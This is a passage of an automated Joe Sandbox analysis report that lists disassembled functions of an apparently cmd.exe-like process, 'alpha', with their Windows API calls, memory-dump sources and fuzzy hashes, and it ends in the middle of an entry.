                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1826527819-0
                                                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                      • Instruction ID: cf991dfe946150cf86dd423122d1c9b225a329de7101ba998f328d310628cede
                                                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                      • Instruction Fuzzy Hash: 63016131908682CAE6A47B35A4941B8FA69FF8E756FC45134D54F163A1DF3C9048CB60
                                                                                      Function 00007FF793753060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7937492AC), ref: 00007FF7937530CA
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF7937530DD
                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7937530F6
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF793753106
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1464828906-0
                                                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                      • Instruction ID: 5b11e0cabb63fba5ec371f99ba4730bd387160f705bac049b412ec98dba40d75
                                                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                      • Instruction Fuzzy Hash: 41310721A0861582F6B9AF36A48017EF665EB4DB90FD48236DA4E573E0DF7DE8458320
                                                                                      Function 00007FF79374CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                      • API String ID: 2221118986-3416068913
                                                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                      • Instruction ID: 1dd00eea0e31be46af8d4a2878d19f1a081495407168b3b8dfa40ac4ea44f51f
                                                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                      • Instruction Fuzzy Hash: 6D110625B0864381FFF4EB31A1C42B992999F8CBA4F984235DE2D6B3D5DE2CE0408360
                                                                                      Function 00007FF79374BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcschr
                                                                                      • String ID: 2$COMSPEC
                                                                                      • API String ID: 1764819092-1738800741
                                                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                      • Instruction ID: 401d013b1083e3836b6698e574be70b93731c1fb4dd8b1b5887cb2deaa50f255
                                                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                      • Instruction Fuzzy Hash: AC517021A0865385FBF8BB3594C9379A2DE9F8D784FC44031DA8D662D6DE2CFC448761
                                                                                      Function 00007FF793752EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 4254246844-0
                                                                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                      • Instruction ID: c039c71613fb496dcb0a695a45d460ec9e5853126bc18bb05143b98c1dedb4cb
                                                                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                      • Instruction Fuzzy Hash: AA41D622A0874686FEB9AB20E4C4379E7A8EF8D790FC44432D94E577D0DF3CE4418620
                                                                                      Function 00007FF79375498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                      • String ID:
                                                                                      • API String ID: 2643372051-0
                                                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                      • Instruction ID: aed86b566aed323ecd274d5598a41411d1de61c39f514bb8f8e72ccd8f9b9593
                                                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                      • Instruction Fuzzy Hash: 38F0D662A1DB8285EBA4AB35F4C4075EAE5FF4D7A1B869234C52F13390DF3C94448260
                                                                                      Function 00007FF793755A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleMode
                                                                                      • String ID:
                                                                                      • API String ID: 1591002910-0
                                                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                      • Instruction ID: 6e0270f3415e1c20a7153add33fbe9e3d80da1c09cc44a434a9427a2150cf3f5
                                                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                      • Instruction Fuzzy Hash: 22F07A34A09642CBE6A8AB30E8C5078BBE4FB8D712F844174C90F63360DF3CA5058B61
                                                                                      Function 00007FF79375291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: :
                                                                                      • API String ID: 338552980-336475711
                                                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                      • Instruction ID: 93237230a9f991ab61e453467b9c04a3d2c66d58becc0472cfe4ca180cf1aada
                                                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                      • Instruction Fuzzy Hash: 6DE09267618640C7E770AF60E4910AAF7A0FB8D349FC41525EA8E93764DB3CD249CF18
                                                                                      Function 00007FF793755AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF793755B52
                                                                                        • Part of subcall function 00007FF793754224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754297
                                                                                        • Part of subcall function 00007FF793754224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937542D7
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF7937542FD
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF793754368
                                                                                        • Part of subcall function 00007FF793754224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754380
                                                                                        • Part of subcall function 00007FF793754224: wcsrchr.MSVCRT ref: 00007FF7937543E6
                                                                                        • Part of subcall function 00007FF793754224: lstrcmpW.KERNELBASE ref: 00007FF793754401
                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF793755BC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 497088868-0
                                                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                      • Instruction ID: eaf17062f21016f1e6bc0f9c8175ced092006246eae238aef43b3df1c3c64531
                                                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                      • Instruction Fuzzy Hash: A6318420B0C64282FAB8B731A4D457DF299EF8DB90F845436E94EA7B95DE3CE5058720
                                                                                      Function 00007FF793753A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(?,?,?,00007FF79376EAC5,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793753A56
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                      • Instruction ID: 3227d2b43baa87fe78afaa39f81c997b59a30b4b9f05832c0b6d7c728b955b35
                                                                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                      • Instruction Fuzzy Hash: 59019620E0868395F6F8A775A5C0275E6A8EF5CB90BD09432E50EA2664DE2CE5918770
                                                                                      Function 00007FF793759A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1412018758-0
                                                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                      • Instruction ID: f59dcc5536fd22f389055c3163191533b997f1c1db1b86519b9fe18bbef171c4
                                                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                      • Instruction Fuzzy Hash: 59E0ED41F5A70B91FEBD3B7268C117492595F6E741E9C2431DD1E25382EE2CE195C331
                                                                                      Function 00007FF79374CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                      • Instruction ID: cf4d31980cf72856f8e0e6252a37df807f68fc2ceb7b29550c7bc47000b0d00d
                                                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                      • Instruction Fuzzy Hash: 2CF08135A1864286FBA4AB25F8C0078FBE9FB8DB01B989035D90E23354DF3CE441CB20
                                                                                      Function 00007FF793754C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: exit
                                                                                      • String ID:
                                                                                      • API String ID: 2483651598-0
                                                                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                      • Instruction ID: 23f8421869b77d8826dedc186944697a66144715d6c2e9c2f573d99d3b5c811c
                                                                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                      • Instruction Fuzzy Hash: 3FC08C30B0C64687FBBC7B3128D507E99EC6F8C302F84683DCA0B95382DE2CD8088620
                                                                                      Function 00007FF793755508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultUser
                                                                                      • String ID:
                                                                                      • API String ID: 3358694519-0
                                                                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                      • Instruction ID: 9451ec61dcfcdeb647c9fa3c5b07e23605b9850c5dc86a18ac5aa985a5707b6f
                                                                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                      • Instruction Fuzzy Hash: E3E0C2A2D082538BF5FC3E6160C13B4A99BCB6C7A2FC44032C60F252C0892D28415228
                                                                                      Function 00007FF793752E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
